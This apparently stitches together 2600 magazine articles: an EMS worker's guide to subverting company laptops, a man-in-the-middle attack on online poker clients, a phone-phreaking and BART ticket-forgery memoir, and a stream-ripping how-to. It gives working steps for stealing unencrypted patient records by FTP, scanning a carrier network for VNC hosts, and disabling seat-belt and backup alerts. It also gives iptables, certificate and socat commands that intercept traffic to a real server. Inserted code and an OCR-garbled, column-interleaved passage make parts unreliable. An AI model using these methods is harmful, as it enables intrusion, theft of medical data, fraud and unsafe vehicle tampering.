The computers used in the field as of the time of my internship were all Itronix GoBooks. The company initially purchased GoBook I's (the first generation), and has purchased whichever model was most current ever since then. The latest model is the GoBook III, but there are plenty of GoBook IIs still around. Hardware specs are available at http://www.itronix.com and http://www.gobookiii.com/gb3/features.htm. The interesting hardware components include Bluetooth capability (left active and unsecured), 802.11b/g (AMR typically orders only 802.11b chipsets), and CRMA cellular frequency cards. The CRMA cards are the PC cards available from wireless providers such as Cingular and Verizon. AMR uses both companies for mobile Internet access in different regions depending on which provider has the best coverage for a given area. The cards are housed internally and connect to an external antenna mounted on the screen portion of the case. We'll come back to this device later for a discussion of the security holes it presents.

AMR upgraded these units to Windows XP only over the last year or so. The official explanation was that they feared Windows XP would somehow not support the Access Database front-end they use for charting. What I find so amusing about this is that they purchased a Windows XP Professional license with every GoBook III and then relied on their Win2K corporate license for the actual OS licensure. However, when they switched to WinXP they actually purchased a corporate license to cover all of the computers that they already had licenses for! This, of course, means you stand a good chance of being able to use the WinXP Pro license stuck to the bottom of the GoBooks without getting caught.

Now, Windows XP Pro can join an Active Directory domain (duh), and AD has several security policies that can be implemented to limit the access users have, but you need a Domain Controller supplying the Group Policy Object in order to have different policies apply to different users. With the computers being deployed in the field constantly they could not be part of a domain-based network. This posed a real problem in that supervisors and IT staff needed much more access to the machine than AMR was willing to allow their field employees to have. So someone poked around on the Internet and found that by replacing the actual user GPO file you can implement different security measures for different users. Basically, you create two different GPO files, one older than the other and having tighter security, and swap them around like this: Log on as an administrator and place the newer and less secured GPO named registry.pol in the c:\windows\system32\GroupPolicy\User\ directory. Next, log on under each of the users you want to give more access to (i.e., supervisors and IT personnel). Then, log on as the admin again and move the GPO to a different folder and replace it with the older registry.pol file with more security. When the supervisor and IT users are logged on with the older GPO in place it is ignored because the policies that are currently applied are newer than the ones in the current GPO. The standard users however are never logged on with the newer policy in place so they implement the older, more secure policy. Of course, these policies are typically very poorly managed and there isn't a whole lot you'd really care to do that a creative mind won't figure out how to accomplish. Instead of browsing directories to launch programs, create shortcuts on the desktop. And since you can always create a new text file on the desktop you have complete freedom in writing batch and Windows Script files to do your bidding.

Because AMR doesn't like their employees goofing off on the clock they also install ContentWatch to restrict Internet use. This service works by restricting websites based on their categorization in a database obtained from an Internet server. A user logs on with a username and password and their restriction list is downloaded. Each site visited by Internet Explorer is compared against a database that categorizes sites based upon content (e.g., shopping, news, personal, adult, etc.) and users are only allowed to view sites within approved categories. Sites that have not been categorized can be blocked or viewed based upon the individual user's settings that are applied by their administrator. Since the restriction lists are downloaded each time a user logs on I have not found a way to get around this particular hurdle. It's not that I wanted to download porn. I just wanted to
use MySpace and "personals" are restricted. The best way to overcome this would be to snag a supervisor's password since they have free access or to find a way to kill the program. Thus far I have been unsuccessful in killing it, but I never tried too hard either. Of course, if you're brave and don't mind a traceable approach you could always download Firefox via a telnet'd FTP connection. If you intend to do this I suggest burying the program files deep in the directory structure and launching via an unassuming script in the system32 or some other clogged directory. You might also want to dig the uninstall data out of the registry so it doesn't show up on the "Add/Remove Programs" control panel. See, they'll trace the time stamp of the program directory back to who was using the computer on that date at that time, and unfortunately the system clock is fairly well protected.

Moving on to the ever more interesting section where we discuss the CRMA PC cards and how they access the Internet. The region I am most familiar with used Cingular as a wireless provider and Sony GC83 EDGE PC cards. I'm not sure why, but they refuse to use the most recent firmware versions. Rumor has it someone somewhere had a problem with a firmware version and had to downgrade to fix the problem. Of course, two or three new versions have come out since then and AMR has yet to upgrade to the newer versions. What I find particularly interesting is that the Cingular network issues Class C addresses. Couple this with the use of RealVNC on every AMR computer and you have a gaping security hole. If someone were to snag the company password (I believe they have only two passwords - one for workstations and one for servers) they could sniff around the Cingular network, assuming they have a Cingular card and are in the same region, and find a computer with port 5900 open. The advantage to the IP addressing scheme being Class C, for those who haven't figured it out, is that you significantly diminish the number of IP addresses you have to scan to find an AMR computer (a /24 holds at most 254 hosts). But there is another way you can isolate an AMR computer on this network.

As previously mentioned, AMR uses an Access Database front-end developed in-house to chart patient data. They have dubbed the program MEDS. It stands for Multi-EMS Data System. The database is unencrypted so any user can poke around in all of the tables, provided they can figure out how to launch MSACCESS.EXE. This is nice in that it stores configuration data, including what ports the program uses for sending and receiving, in these tables. Browse around and figure out what ports are currently being used and query the results of your port scan for addresses with both the MEDS port and port 5900 open. Any computers you find will likely be AMR's.

Exploring MEDS even more turns up a few other interesting little quips. The data entered into MEDS is stored in separate Access tables with a PCR ID referencing the individual chart each piece of information is associated with. For instance, there is a table titled MED_C that contains the list of patient medications typed in by a user (medications selected from a drop down list are stored in a separate table). Each row has three columns. The first column is the default primary key and increases by a value of one in each row, the second column is the individual PCR ID (unique only on that computer), and the third is the actual text entered by a user. So to find a patient's personal information you need only run a query of the appropriate tables and match the patient's name, date of birth, address, phone number, and Social Security Number based on the PCR ID. It should be noted that failure to protect this information from unauthorized users (which includes an EMT or paramedic authorized to use the system but not authorized to view data entered by another user) is a violation of federal law - reference the HIPAA Security Rule, 45 CFR 164.308(a)(4), which states that users must be prevented from accessing sensitive electronic data they do not need to access in order to perform their duties. Basically, you should not be able to view patient data you did not personally enter, but you can. But to really get at the data it's best to just steal the whole database, something else you should definitely not be able to do. A standard user can run telnet, open a connection to an FTP server, and upload "C:\Program Files\MEDS\MEDS.mdb" (sometimes the file name includes a version number). Older versions of MEDS created a file in the root directory titled "PCRDATA" with no file extension. This file had all of the PCR data on the system in plain text, another grievous HIPAA violation. Today the file is encrypted, a step that took only four or five years to implement.

As you can see, by doing things in-house and under-budgeting their projects AMR has left themselves open to some pretty costly lawsuits. With the private ambulance industry becoming more and more competitive, they have really taken some big chances with this program. Consider the fact that some states have mandated public reporting of security breaches in publicly traded companies, mix it with the generally very competitive public bidding process that EMS agencies are typically required to go through every few years for their ambulance provider contracts, and throw in a little industrial espionage... see where I'm going? AMR has opened itself to simple espionage tactics by making it incredibly easy for a corporate spy to get hired on as a field employee, steal protected personal data stored on a field system, and let it be known that the data was stolen. AMR would then be required to contact every person whose personal information was compromised and inform them of such and make a public announcement reporting the breach. Something of that nature happening during a contract bid would be devastating to the company, which is already losing bids across the nation.
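The host-finding step described above (scan the carrier's /24 and keep the addresses with both the MEDS port and VNC's 5900 open), as an added Python example rather than anything from the article: it parses nmap's grepable (-oG) output, constructed here with made-up addresses, and correlates the open ports per host. The MEDS port value 4011 is an assumption standing in for the number the article says to read out of the Access tables; the same function works for any port signature.

```python
"""Correlate port-scan results to find hosts exposing both the MEDS port and VNC.

Added example, not the article's own tooling. The scan output below is
constructed in nmap's grepable (-oG) format with made-up addresses, and the
MEDS port (4011) is an assumed value: the article reads the real one from the
MEDS configuration tables.
"""
import ipaddress
import re
from typing import Dict, List, Set

VNC_PORT = 5900
MEDS_PORT = 4011  # assumption; substitute the port found in the MEDS tables

# Constructed sample of `nmap -oG -` output for one /24 on the carrier network.
SAMPLE_SCAN = """\
# Nmap 4.20 scan initiated as: nmap -p 5900,4011 -oG - 10.20.30.0/24
Host: 10.20.30.7 ()\tPorts: 5900/open/tcp//vnc///, 4011/open/tcp//altserviceboot///\tIgnored State: closed (998)
Host: 10.20.30.19 ()\tPorts: 5900/open/tcp//vnc///, 4011/closed/tcp//altserviceboot///
Host: 10.20.30.44 ()\tPorts: 5900/filtered/tcp//vnc///, 4011/open/tcp//altserviceboot///
Host: 10.20.30.88 ()\tPorts: 5900/open/tcp//vnc///, 4011/open/tcp//altserviceboot///
Host: 10.20.30.200 ()\tStatus: Down
# Nmap done
"""

# One grepable line per live host: "Host: <ip> (<name>)\tPorts: <port>/<state>/<proto>//<svc>///, ..."
_HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(.*?\)\s+Ports:\s+(.*)$")


def parse_grepable(text: str) -> Dict[str, Set[int]]:
    """Map each scanned host to the set of ports nmap reported as open."""
    open_ports: Dict[str, Set[int]] = {}
    for line in text.splitlines():
        m = _HOST_RE.match(line)
        if not m:
            continue  # comments and hosts that are down carry no port list
        host, ports_field = m.groups()
        ports: Set[int] = set()
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) >= 2 and fields[1] == "open":
                ports.add(int(fields[0]))
        open_ports[host] = ports
    return open_ports


def hosts_with_all(open_ports: Dict[str, Set[int]], required: Set[int]) -> List[str]:
    """Hosts exposing every port in `required`: the MEDS-plus-VNC signature."""
    return sorted(
        (h for h, p in open_ports.items() if required <= p),
        key=lambda h: ipaddress.ip_address(h),
    )


def same_slash24(card_ip: str) -> ipaddress.IPv4Network:
    """The /24 ("Class C") block a card's own address sits in: the scan range."""
    return ipaddress.ip_network(card_ip + "/24", strict=False)


if __name__ == "__main__":
    print("scan range:", same_slash24("10.20.30.57"))
    print("candidates:", hosts_with_all(parse_grepable(SAMPLE_SCAN), {VNC_PORT, MEDS_PORT}))
```

The same correlation, run by the owner of the fleet against its own address block, is the cheapest detection of a laptop that has been re-imaged with VNC reachable from the carrier side.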
That's pretty much all of the goodies I picked up regarding the computers, but here are some fun vehicle facts for those of you unfortunate enough to be working for the giant:

1. If you're tired of hearing the seat belt reminder ding at you all the time you can disable the Ford "BeltMinder" feature quite easily. Simply turn the ambulance off, keep all of the doors closed, set the parking brake, turn off the headlights and do the following: Insert the key and turn it forward to the first position, but do not start the car. After about a minute the little guy wearing his seat belt light will appear on the cluster panel (dashboard). You now have 30 seconds to buckle and then unbuckle your seat belt ten times. After the tenth time the light will flash four times indicating the function has been disabled. Now buckle and unbuckle one more time. Congrats, it will now leave you alone. Each year is different so play around with it. I found this information on Google, so you should be able to as well. Sorry for those who have RoadSafety. This won't work for you.

2. If you don't like being dinged at for having the door open, or having the light on, it's pretty easy to disable this feature too. First, you should know that when the door is open the circuit is closed by the door pin. So disconnecting the door pin will make the vehicle computer think the door is always closed. To do this, just pull really hard (I was able to do it with bare fingers) on the door pin itself. When it comes out simply disconnect the wires and then reinsert the pin into the door jamb. Done.

3. Finally, to shut up that lady who blabs at you while you're backing up just take a look at the little speaker behind the driver's head. On one side is a tiny little switch. Flip it and she'll be no more.

None of these little workarounds damages or vandalizes the vehicle in any way, so have at it. And for God's sake, find a company with a soul to work for. Peace!
HOPE NUMBER SIX

If you missed out on our latest conference (or if you were there and somehow managed to miss one of the more than 70 talks given), may we suggest getting ahold of our HOPE Number Six DVDs?

There's no way we can list them all here but if you go to http://store.2600.com/hopenumbersix.html you'll get a sense of what we're talking about.

We still have leftover shirts too. For $20 you get a HOPE shirt, a conference badge, a conference program, and a HOPE sticker. Overseas add $5 for shipping.

2600
PO Box 752
Middle Island, NY 11953 USA

SSL MITM Attacks on Online Poker Software
by John Smith

Although we most often associate SSL (Secure Sockets Layer) or TLS (Transport Layer Security) with "secure" versions of our favorite Internet services (HTTPS, IMAPS, SMTPS), it can be used to secure arbitrary applications. In fact, it is used quite often in the online gambling world to secure the connection from the game client to the game server. Unfortunately it is often used in an incorrect manner, which leaves it open to man-in-the-middle attacks, where an attacker can read/modify/insert their own data into the connection.

SSL provides methods for endpoint verification and traffic privacy for network communications. Endpoint verification is done by validating a "peer certificate" from the remote host by checking the signature with a trusted third party (such as Verisign). Traffic privacy uses symmetric ciphers to encrypt/decrypt data between the two hosts.

Traffic privacy is obvious - you don't want someone with a sniffer to see your passwords or credit card number when you're ordering your 2600 subscription. Endpoint verification is extremely important also, but many developers (obviously) don't think of it. In fact, the endpoint verification is exactly what prevents man-in-the-middle attacks - if the peer (remote server) that is being connected to can't be verified, then the client should quit. Unfortunately, this option is turned off by default (OpenSSL's API, for one, starts out at SSL_VERIFY_NONE)! Any client software that has this flaw can then be attacked.

The man-in-the-middle attack consists of three steps: redirecting network traffic, answering requests from the client on behalf of the server, and answering requests from the server on behalf of the client. I chose to use ARP-cache poisoning and iptables mangling for the redirection, and socat to actually execute the man-in-the-middle attack. I managed to break Virgin Poker's and City Poker's clients, viewing all client-server traffic in clear text.

Traffic Redirection

Getting network traffic from the victim isn't too hard. If you're on the same LAN you can use ARP cache poisoning or DNS hijacking. Rootkits are an option too; there are rootkits for UNIX and Windows which can be made to redirect network traffic to an attacker. Insecure routers are another option; that Linux router the neighborhood geek set up for pizza and coke looks like a juicy target....

My traffic redirection solution involved a Perl script for Nemesis, which injects unsolicited ARP requests, and iptables packet mangling to rewrite the destination server IP address/port with a local one. All you need to do is figure out which IP the poker client talks to and rewrite it to your waiting MITM process. For example, City Poker uses IP 200.124.137.109 port 443. If I'm running my socat process on port 10007, the firewall rule becomes:

    echo 1 > /proc/sys/net/ipv4/ip_forward
    /sbin/iptables --policy FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp -d 200.124.137.109 --dport 443 \
        -j REDIRECT --to-ports 10007

The first two lines allow us to forward traffic and the third line is our firewall rule.

Man-in-the-Middle Process

Although we can roll our own man-in-the-middle process, I chose to use socat for simplicity. If you're going to write your own, you simply need to have it listen for SSL connections on one side and establish them on the other. You will need to generate a fake server certificate that will be given to the client - self-signed/expired doesn't matter since the client isn't checking! Here are the commands to generate a self-signed certificate, and to set up socat to perform the MITM, logging data in cleartext to stdout:

    openssl req -x509 -nodes -newkey rsa:1024 -days 365 -keyout fakecert.pem \
        -out fakecert.pem
    socat -v -x openssl-listen:10007,certificate=./fakecert.pem,verify=0,fork \
        openssl:200.124.137.109:443,verify=0 2>&1 | tee ./cityPokerCapture.txt

When generating the certificate, I just chose all the defaults. The "-nodes" argument means you don't want to enter a passphrase (password) for the key. The socat line sets up an openssl-listen socket on port 10007 with the fake certificate we generated above. It will log the transferred data, in text and hex ("-v -x" arguments), to stderr, which the 2>&1 merges into the pipe to tee, and establish an openssl connection to the real game server without verifying the peer certificate (verify=0).

You should now be able to fire up the poker client and see a nice cleartext version of everything running between the client and server.
Conclusions
wrote a tool to check for expi red/sel f
si gned cert i fi cates and scanned 645 SSL ports
on a /1 9 network wel l known for host i ng
gambl i ng-rel ated s i tes. I t found 3 04 ports that
were mi sconfi gured and are therefore open
to thi s type of attack. Some compani es do thi s
I mpl i cations the ri ght way - Prty Poker, for exampl e, ver i -
My ori gi nal moti vat i on was to t ake a fi es the peer cert i fi cate and checks the s ubj ect
l ook at poker protocol s, to see how " chatty" name i n the cl i ent .
they are and what i nformati on i s transferred. Thi s fl aw i s actual l y qui te easy to fi x. On
For exampl e, what i f the protocol desi gner the cl i ent s i de, devel opers shoul d al ways val i
thought i t wou l d be OK i f al l of a pl ayer's date the peer certi fi cate (at l east in produc
" hol e cards" (two cards deal t before t he fi rst t i on ! ) and servers shoul d have SSL cert i fi cates
round of bett i ng) were sent to each cl i ent s i gned by real CAs. Protocol devel opers
before the hand began. We can reverse engi - shou l d always ass ume that the protocol can
neer the protocol and see what t he command be vi ewed and treat i nput from the c l i ent
structure i s l i ke. I s there a debug mode or as tai nted. Data shoul d be checked wi t h a
speci al admi n commands that we can send? defaul t reject pol i cy - even though t he cl i ent
The server process now l oses any cl i ent-si de and server were wr i tten by t he same team,
fi l ters for t hi ngs l i ke data l engths and types. that doesn't mean you shoul dn't sani t i ze data
Can you say "fuzzer?" before us i ng i t.
Snooped data from City Poker dealing the turn card.
Snooped data from Virgin Poker connection ping and reply.
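The client-side fix the Conclusions call for, as an added example in Python (not the author's scanning tool and not any poker vendor's code): a TLS client context that actually verifies the peer, its verify=0 counterpart for comparison, and the expired/self-signed check the author's scanner performed, run here over constructed certificate summaries rather than live connections. The host name and dates are made up.

```python
import socket
import ssl
import time

# Constructed certificate summaries in the dict shape that
# ssl.SSLSocket.getpeercert() returns after a verified handshake.
# Names and dates are made up for this example; nothing here comes
# from the poker clients or servers discussed in the article.
SELF_SIGNED_CERT = {
    "subject": ((("commonName", "poker.example.invalid"),),),
    "issuer": ((("commonName", "poker.example.invalid"),),),
    "notBefore": "Jan 01 00:00:00 2007 GMT",
    "notAfter": "Dec 31 23:59:59 2007 GMT",
}
CA_SIGNED_CERT = {
    "subject": ((("commonName", "poker.example.invalid"),),),
    "issuer": ((("organizationName", "Example Root CA"),),),
    "notBefore": "Jan 01 00:00:00 2007 GMT",
    "notAfter": "Dec 31 23:59:59 2099 GMT",
}


def cert_problems(cert, now=None):
    """Flag what a scanner for expired/self-signed server certificates looks
    for. Returns a list of problem labels; an empty list means the
    certificate is at least plausibly CA-issued and within its validity."""
    now = time.time() if now is None else now
    problems = []
    # A self-signed certificate names itself as issuer.
    if cert["issuer"] == cert["subject"]:
        problems.append("self-signed")
    if ssl.cert_time_to_seconds(cert["notAfter"]) < now:
        problems.append("expired")
    if ssl.cert_time_to_seconds(cert["notBefore"]) > now:
        problems.append("not-yet-valid")
    return problems


def hardened_client_context(cafile=None):
    """Client context that refuses an unverifiable peer: chain validation
    against trusted CAs plus hostname matching, the two checks the
    article's vulnerable clients had switched off."""
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def noverify_client_context():
    """The weak setting, the Python equivalent of socat's verify=0, kept
    only so the two configurations can be compared side by side."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False     # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def context_is_mitm_resistant(ctx):
    """True only when both checks are on; either one alone still lets a
    forged certificate through (a valid cert for the wrong name, or a
    name match on an untrusted chain)."""
    return bool(ctx.verify_mode == ssl.CERT_REQUIRED and ctx.check_hostname)


def connect_and_audit(host, port, ctx, timeout=5.0):
    """Handshake with host:port under ctx and return (accepted, problems).
    With the hardened context an unverifiable peer raises
    SSLCertVerificationError and the client bails out, which is exactly
    the behaviour the article says a client must have."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw:
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                cert = tls.getpeercert()
                # getpeercert() is empty when validation was skipped, so the
                # verify=0 path cannot even tell what it connected to.
                return True, (cert_problems(cert) if cert else ["unverified"])
    except ssl.SSLCertVerificationError as exc:
        return False, ["rejected: %s" % exc]


if __name__ == "__main__":
    for label, cert in (("self-signed", SELF_SIGNED_CERT),
                        ("CA-signed", CA_SIGNED_CERT)):
        print(label, cert_problems(cert) or "ok")
    print("hardened resists MITM:",
          context_is_mitm_resistant(hardened_client_context()))
    print("verify=0 resists MITM:",
          context_is_mitm_resistant(noverify_client_context()))
```

connect_and_audit is the part that needs a network; the other functions run offline against the constructed summaries.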
Oorlof mijn arme schapen
Die zijt in groten nood
Uw herder zal niet slapen
Al zijt gij nu verstrooid!
The above is from "Het Wilhelmus" (the Dutch national anthem), verse 14. It's a concept and it doesn't translate well to English. "Hacker" is a concept about concepts. Unfortunately it doesn't translate well to any language. My life is about turning concepts into useful products. A hacker does that and much more. Let's get to it.
In the 60s, AT&T ran an ad campaign: "The telephone is not a toy." Thank you AT&T! Vietnam, LBJ, the Cold War, and so on... everything was a lie. So the telephone must be the best toy ever invented! Is a greater understatement possible?
I always wanted the other end to hang up first so I could hear what it sounded like. That little "plick" trailing off in the background was fascinating. I realized it must play the major role in making and maintaining the "long distance" call. Soon I could whistle it and see what it could do - before the Quaker Oats whistle and 800 numbers.
My early experimentation was only to places my parents called. They only looked at the "place" on the bill and if I had an "accident," that was simply it for the day.
There was more, so much more. Sometimes after placing a "toll call" (a type of local call) I'd hear the number I pulse-dialed pulse-dialed a second time. There were beeps associated with this. Other times I would hear beeps that sounded like steel drums. I loved the "drums" and quickly realized this wasn't music but communications! (They were MF tones, to be precise.) I was on to something. The "ultra-modern" phone system was using the same technique the primitive "Bush people" had used for generations. It was obvious tones were telling the other end what to do whether I heard it or not. How did they do it? "Ask and you shall receive." When everything seemed to be a lie, that biblical verse was to be the truth. The little brat was becoming an operator and learning how to social engineer. Soon, the secret was mine.
Best of all, I was to discover I wasn't alone. There was this kid in sixth grade named Dan N. He was the shortest kid in the class but very strong and nobody messed with him. Dan was later to tell me of someone who could make "free calls" with sound like I could. That man was Cap'n Crunch.
It was 1969. We were a few 12-year-old boys and there were a few twice our age. We knew we had something going into junior high, but we had no idea what our impact on society was to be.
With an age range between 11 and 14 years, junior high was the ultimate freak show. For some of us it was a "phreak" show and we didn't show a thing outside our tight group. This was a very uneventful time in my life.
In 1970 a very small piece in Popular Science reported on a new payphone with a picture of this most ugly beast. The most important features were a single coin slot and "silent electronic signals to replace the familiar sounds that currently signal the operator of deposited coins." Interestingly, these horrors were to show up first where I lived. I was going to find out what those "silent signals" were. First, I had a friend call me at one of these "fortress phones" while he recorded the call. I "sacrificed" 40 cents (my lunch money) to do this. I instructed my friend to call back on the off chance I got the money back and we could record the tones again. Sure enough it returned! We were able to repeat this several times. Don't forget: Hacking is scientific. It was a simple matter to whip up a simple phase-shift oscillator and amplifier to match the frequency (quickly determined to be 2200Hz but that isn't important). We needed a way to gate the tone.
A small strip of copper was taped with ordinary cello tape in such a way as to leave five stripes of copper about 8mm wide exposed. This formed, with a conducting probe, a custom switch. With just a couple of minutes
of practice it was very easy to exactly emulate the timings. We took turns calling a fortress phone and comparing their tone generators with ours. No discernible difference! We had broken the mighty fortress within hours of their debut. Millions of dollars AT&T spent versus one dollar's worth of parts. Nothing else mattered.
[Much later they thought they got smart and introduced 1700Hz (sometimes 1500Hz) but somehow they missed what hackers were able to do with CMOS. We could create phase-shift oscillators as perfect as their L/C oscillators. Later DTMF and MFc chips became available and by replacing the 1MHz crystal with an L/C oscillator, a very close approximation could be obtained. Red and blue, or "rainbow" (named after a drug), boxes were popular. These chips were extremely expensive, but fortunately free for me. Much later, the 5087 came out for 50 cents. A very cheap, no effort red box! The big question: "How much honey or maple syrup does it take to make a "fortress phone" sound like a 6.5536MHz crystal-based red box?" The "quarter," designed by a very competent engineer, was to solve half the problem. A damn 6.5536MHz rock was still used, but replacing that with an L/C circuit made a perfect box. Hackers can wind coils! Hope you kept your back issues of 2600.]
High school finally. The principal welcomed the new "class of '75" and warned the returning students to be nice to us. Silicon Valley was just beginning to form out of the long established anchors: Lockheed Aerospace, Hewlett-Packard, and Varian. Our school district found itself with more money than it could use. We were being addressed on a newly installed closed-circuit TV system. We were told there were 2600 students enrolled. Very amusing in a somewhat secret way.
This was going to be an interesting and eventful year. I was to see a computer for the first time and actually use one in real-time. The "math resource center" had an "ASR33 Teletype" terminal installed. This connected to a central timesharing machine at 110 baud. It was UNIX! While new, UNIX was very easy to use. All students were welcome to try the new equipment. Punch cards still ruled and "computers in the classroom" were a distant dream for most schools.
The summer of 1971 had something brewing that was going to forever change the public notion of "hacker." A virtual unknown, Don Ballanger, got busted for selling blue boxes to what many believe was the Mafia. While not a "snitch," Don was highly criticized for getting busted for something few of us believed was illegal. He was to be in contact with Ron Rosenbaum of Esquire, a men's magazine you'd find next to Playboy. Ron wanted sensation. He managed to talk to many phreaks. While the piece he published in the October 1971 edition of Esquire contained some bullshit, it was to lead to the first police "hacker roundup." The piece was also read on Pacifica Radio's KPFA in Berkeley just prior to its release, possibly directed to the "blind phreaks." Crunch picked up a copy at a local newsstand on his way to San Jose City College and read the rather lengthy article without putting it down. He called Denny, the ringleader of the blind phone phreaks, and read it again. He apparently recorded the call for other blind phreaks. This was the end in one way but also a new beginning - a whole new definition of hacker.
Myself, I was caught with what was to later be known as a "red box," something 2600 would cover heavily almost 20 years later. Because I was a minor, news of this in the USA was very slight. But this didn't stop Canada from publishing my name, since it wasn't illegal to publish the names of minors there. I didn't learn until later, but I was to become their "Crunch" and start a popular national pastime. The red box was simply a utility that made using the blue box much easier from most of North America. Nobody knows where the term "blue box" actually came from. The tone generator in one of the massive "fortress phones" is red. Actually it's in a pink case, possibly to keep people out? Clearly, red is more manly.
Unfortunately, my boarding school, university, and much information you need to understand me has been edited out. I don't even have the space to tell you about seeing a real gymnasium-sized computer in 1974. However, before we move on to the Netherlands, I'm going to outline the thought process that was to become my defining hack. I broke BART (Bay Area Rapid Transit) at its weakest point: revenue collection. It was almost as simple as a red box and has been outlined previously in these pages.
The "BART hack" was not the first time tickets were duplicated. Rather, it was a rethink on how it should be done. Traditionally, "criminals" used a lot of huge, heavy machinery, sometimes even stolen ticket vendors that weigh nearly a ton. This was to be an ultra-simple portable device, weighing
less than half a pound, small enough to hold in the palm of your hand. Our intent was to show the world that all "security" could be defeated for less than $20. On Christmas Eve, we made several hundred $8 tickets and just gave them away to people. These were 100 percent real BART tickets!
In the early 90s I published an article in 2600 on how to do this. These were the very plans the authorities were trying their best to keep out of public view! You must be a "hacker" to use them, but with a complete understanding, it works. In the case of BART, the card was proprietary, so powdered iron gave us the answer. We needed full track 8mm card-reader heads. Amazingly enough, BART dumped about 50 to a surplus shop at the Oakland airport. At 50 cents each it was a bargain and we bought them all. With the powdered iron, we determined there was another element of obscurity: The domains were rotated 7.5 degrees.
The Washington D.C. Metro used the same bogus IBM system as BART (both exist to this day). We liked to play with BART by adding fare to WM tickets! The tickets have a matrix-printed strip that shows the user the remaining value. (Most ticket scams are simply printed cards sold to "greedy people.") If one was inside the system with an "overprinted" card, there would be some explaining to do. So this was the solution: We would make a magnetic stripe card (a used BART ticket with five cents remaining) with a value of (then) $7.95, insert in the "add-fare machine," add five cents, and voila, a real BART issued $8 ticket! The $7.95 we recorded on the ticket that said five cents remained was automatically wiped and no one was the wiser. This was for real and certainly not a scam. This was to be my "ticket to fame and fortune." "Crime" pays: Can it be made any clearer?
While there was absolutely no criminal intent, the BART police (glorified "rent-a-pig" types) didn't think it was very funny. This ultimately forced me to leave the USA, which I didn't think was so funny either at the time, but was to be my "lucky break."
Flash to the end of the "Cold War." It was late in 1989 and I was telling my coworkers that the Berlin Wall was coming down. They all thought I was nuts. Less than a week later it happened. My plans without hesitation were to move to Europe.
East Berlin, 31 December 1989. This was sure to be the biggest party in the world and it didn't disappoint. I had been "swallowed" by Europe and separated from my American tourist friends.
Amsterdam, 1990. I did it! Skipped probation and even told my PO I was moving. I think she didn't believe me and said OK. (One less on her caseload?) I won't go into an extradition attempt, but Holland told them where to stick it.
I smuggled a few i386s in and many more were to follow. This was the first microprocessor that could even come close to being a "computer." In with Linux-0.01. Xenix was history. The Pentium was soon to follow and while I was to play with Slackware and RedHat, FreeBSD was looking very nice. FreeBSD was soon to be my "online" system, though I was to earn considerable money for porting a RedHat distribution to Alpha, a 64-bit platform.
I became involved with Hack-Tic Technologies, a spin-off from Hack-Tic. We sold, in kit form, the hardware hacks. Many, like the Demon Dialer and SemaFun (a pager/SMS decoder) were very successful. Hack-Tic was a short-lived publication that attempted to bring the "look and feel" of 2600 to a Dutch audience. Its downfall was mainly the fact that it was in Dutch as well as the monster it created: XS4ALL.
No Wires Needed was a company formed to complete the development of the WLAN I invented, which started alongside of the BART hack in 1985. DigiCash was the holding company for the ill-fated software patent about all electronic payments and also the most incredible collection of top people one could imagine. All these patents are expired today and everything having to do with "Internet payments" is "prior art." DigiCash developed the smart cards we use (everywhere except the USA). Sadly the banks felt threatened and DigiCash folded.
Because I was founding Dutch companies, I needed to become legal. The Vreemdelingenpolitie (they normally deal with "people of color") thought it was all a big joke. I was told to "do nothing" and let the case go to court. This white boy from the USA had a 100 percent chance of winning. (Yes, these are extreme right-wing fascists.) Thank you Hanneke for your help.
To be a hacker is to devote your life to what should be obvious. We are not "criminals" and will fight tooth and nail to get them off our Internet. We are fighting a battle that includes Windows, the root of all evil, along with what has become of the fateful decision to make Internet available to low-end computer systems. The evil simply mounts,
but note it will be hackers, not politicians, that solve the problem. Sure, "puppets galore" will take credit. They owe their existence to us. We can "pull the plug" - what is a "Bush Monkey" to do?
The basic evil of today's Internet is more than just Microsoft - the "middle-class OS." IM, spam, spyware, worms, Trojans, social networks online, and much more are directly a result of people and their dumbed-down "OS." Far deeper, the root of these evils truly have been with us longer than most people have known about the Internet. In 1989 we got IRC, an improved form of the silly "Compuserve CB" (talk). It was fine until it died a strange death around 1994. Today we have "social online networks," making IRC one of the more tame computer games. "Online friends" is something for mature audiences, such as the all UNIX Internet (old IRC). When minds are being weakened, we don't need any more of this swill.
As real hackers we solve problems, while the law and politicians only make matters worse. A technical solution to every problem on the net is in order. Put very simply: Hasta la vista, pretenders! Stop crying and start hacking.
Bill Squire to this day works with anything technical. Don't call him a "consultant." That will insult him. He likes to travel long distances: in the winter to "warmer places" and in the summer he prefers a more technologically-oriented tour. There are always so many people to meet.

by Evil Brak
evilbrak@yahoo.com
Microsoft has been very anal when it comes to streaming media and has released little information on their streaming protocol, MMS (Microsoft Media Server). Ripping streams is straightforward but time consuming. All you need is Windows Media Player (called WMP from now on), a program called SDP Multimedia (downloadable from http://sdp.ppona.com/), and the location of the stream you want to download.
First, what you need to do is get the URL of the stream's ASX file. Getting access to the URL differs depending on which site the stream is on. Most sites embed the video into the web page itself. Look for a "Launch External Player" button somewhere on the page; usually this will open a new browser window with the URL of the ASX file or it'll open up WMP (the URL of the file can be found in the playlist). If there is no "Launch External Player" button, then view the source of the page and look for the URL to the ASX file. Once you have the URL, copy and paste it into SDP. If you like you can save the ASX file to your computer. This is helpful since you have a direct link to the stream and you won't have to navigate through the website to get to it.
Next, open up SDP and click on Open. In the box that pops up, paste the URL of the ASX file. If you saved the ASX file, then either paste the path or browse to it. Click on OK and the playlist will open up in the URL's combobox. Select the file you wish to download, then click on Go. Choose where you want the file to be saved. SDP saves audio in ASF format and video in WMV format. If you wish to convert to a different format (e.g., MP3 and MPG) then Google around for converters. There are plenty to choose from.
SDP will download the stream as it plays and therefore a prerecorded ten minute video will take roughly ten minutes to download, depending on server load. Live streams download at the same rate as prerecorded streams but will continue downloading until you click on Abort. You can listen to or watch the stream while you download by clicking on Preview. Another feature of SDP is the VCR. You can set start and stop times to record your live stream. For example, my local radio station has its own stream and if I like I can set SDP to start recording at 5 am and finish at 10 am so I can listen to the morning show when I want. I can leave my computer unattended and SDP will record with no user interaction. Pretty cool, huh?
